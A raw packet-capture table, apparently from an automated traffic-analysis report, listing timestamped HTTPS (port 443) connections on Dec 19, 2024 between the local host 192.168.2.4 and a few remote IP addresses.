                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.700361013 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819669008 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819690943 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819741964 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819760084 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819797993 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.819818020 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823632956 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823677063 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823695898 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823704004 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823731899 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823740005 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.823795080 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.827475071 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.827492952 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.836765051 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.836828947 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.836898088 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.837110996 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.837127924 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.976984024 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.977376938 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.977418900 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.977936983 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.978224993 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.978327990 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.978365898 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.019278049 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.019293070 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.390147924 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.390613079 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.390642881 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394140005 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394217968 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394768000 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394853115 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394979000 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.394989967 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.436242104 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.436611891 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.436646938 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.438170910 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.438241005 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.438644886 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.438759089 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.438796997 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.445211887 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.472789049 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.472867966 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.472955942 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.472990036 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.473210096 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.473234892 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.473256111 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.473267078 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.473304033 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.479346037 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.481313944 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.490190029 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.490225077 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.490319014 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.490354061 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.490401983 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.491036892 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.491070032 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.493140936 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.493365049 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.493380070 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494256973 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494328022 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494647026 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494707108 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494801044 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.494806051 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.535780907 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.537925959 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.566226959 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.566864014 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.566907883 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.567945957 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.568020105 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.568402052 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.568463087 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.568588018 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.568597078 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.592351913 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.612194061 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.642647982 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.642682076 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.669043064 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.669132948 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.669168949 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.669202089 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.669245005 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.676755905 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.687535048 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.687587976 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.687623978 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.687654972 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.687711000 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.695403099 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.703248978 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.703280926 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.703340054 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.703372955 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.703417063 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.711292028 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.719093084 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.719187975 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.719208956 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.726917982 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.727021933 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.727036953 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.734838963 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.734935999 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.734945059 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.741673946 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.741765022 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.741772890 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.747795105 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.748078108 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.748086929 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.749537945 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.749604940 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.750986099 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.751135111 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.751147985 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.755404949 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.755445957 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.755512953 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.755521059 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.755565882 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.780154943 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.780493021 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.780576944 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.781482935 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.781593084 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.781963110 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.782027960 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.782143116 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.782159090 CET44349757104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.791371107 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.796117067 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.796149015 CET4434975634.120.195.249192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.827411890 CET49757443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.850832939 CET49756443192.168.2.434.120.195.249
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.857229948 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.859590054 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.859663963 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.859688997 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.862535954 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.862802029 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.862852097 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.862873077 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.862965107 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.863010883 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.863017082 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.863467932 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.863514900 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.863544941 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.870563984 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.870609045 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.870618105 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.870819092 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.870866060 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.871053934 CET49752443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.871069908 CET44349752104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.878154039 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.878223896 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.878252983 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.882703066 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.882780075 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.882810116 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.882873058 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.891829014 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.891913891 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.900340080 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.900401115 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908520937 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908610106 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908658981 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908677101 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908924103 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908961058 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908963919 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.908981085 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.909020901 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.909559011 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.909641981 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.911225080 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.913625956 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.913693905 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.919673920 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.919722080 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.919722080 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.919738054 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.919785976 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.922312021 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.922384977 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.928034067 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.931108952 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.931171894 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.935908079 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.935971975 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.944462061 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.944530964 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.948750973 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.948808908 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.959626913 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.959686041 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.964180946 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.964248896 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.971951962 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973594904 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973665953 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973706961 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973716021 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973953962 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973978996 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.973987103 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.974004984 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.974056005 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.974647999 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.981868029 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.981918097 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.981921911 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.990211010 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.990259886 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:23.990263939 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024707079 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024899006 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024929047 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024945021 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024956942 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024979115 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.024993896 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.025484085 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.025518894 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.025532961 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.028053045 CET44349753104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.032936096 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.032951117 CET44349754104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.041727066 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.041783094 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.041806936 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.049808979 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.049874067 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.050460100 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.050502062 CET49755443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.050512075 CET44349755104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.053257942 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.053313017 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.057086945 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.057141066 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.063529015 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.063581944 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.069998026 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.070055008 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.073301077 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.073376894 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.073889017 CET49753443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.074064970 CET49754443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.076071978 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.076276064 CET49758443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.076297998 CET44349758104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.077316999 CET44349758104.16.102.112192.168.2.4
